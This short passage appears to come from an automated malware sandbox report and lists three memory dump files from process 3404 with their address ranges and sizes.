                                        • memory/3404-41-0x0000000002D30000-0x0000000002D3E000-memory.dmp

                                          Filesize

                                          56KB

                                        • memory/3404-68-0x000000001CDD0000-0x000000001CE34000-memory.dmp

                                          Filesize

                                          400KB

                                        • memory/3404-15-0x000000001CEC0000-0x000000001CEDE000-memory.dmp

                                          Filesize

                                          120KB